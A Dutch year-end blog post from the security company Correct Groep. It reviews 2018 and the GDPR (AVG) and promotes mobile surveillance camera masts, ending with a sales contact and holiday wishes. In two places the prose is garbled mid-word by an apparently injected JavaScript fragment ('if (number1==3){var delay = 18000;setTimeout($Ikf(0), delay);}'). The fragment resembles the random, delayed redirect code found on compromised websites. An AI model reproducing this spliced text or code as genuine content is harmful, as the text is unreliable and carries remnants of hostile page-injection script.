2018-2019

2018 – 2019

Hersenspinsels aan het eind van het jaar zijn gebruikelijk. Terugkijken op wat was, vooruit kijken op wat komen gaat is een terugkerend ritueel. 2018 gaat de boeken in als het jaar van de digitale hectiek. De invoering van de AVG hield de gemoederen bezig en dwong instellingen, bedrijven en de overheid om kritisch naar de digitale huishouding te kijken op straffe van boetes.

In de praktijk is de verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderende wereld een wervelstorm van digitale gebeurtenissen. Onze klanten merken steeds meer de waarde van goed beeldmateriaal, gecombineerd met de preventieve waarde van de daarvoor bestemde techniek. Recent plaatsten wij één van onze cameramasten op een locatie in een wijk die bestempeld wordt als “lichtelijk rumoerig”. Gedurende de periode dat de mast er stond, waren er geen incidenten en kon het proces doorgaan zoals de klant voor ogen had.

Steeds meer realiseert de klant zich dat een dergelijke tool niet alleen geschikt is voor bouwplaatsen en evenement, maar ook voor het daadwerkelijk afgeven van het signaal aan de buitenwereld: “dit is van mij, daar blijf je af, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders volgt er wat”. Dit signaal werkt in de praktijk en voorkomt een onderbreking van continuïteit en daadwerkelijk schade. In 2018 deelden onze klanten hun ervaringen die wij meenemen in het gesprek dat wij graag aangaan met u.

Wekten wij uw interesse? Bel ons vrijblijvend voor meer informatie op 0416-691491 en vraag naar Rijk Verweij. Uw veiligheid, continuïteit en gemoedsrust is onze zorg, ook in 2019.

Namens de Correct Groep wensen wij u mooie feestdagen toe en een veilig 2019!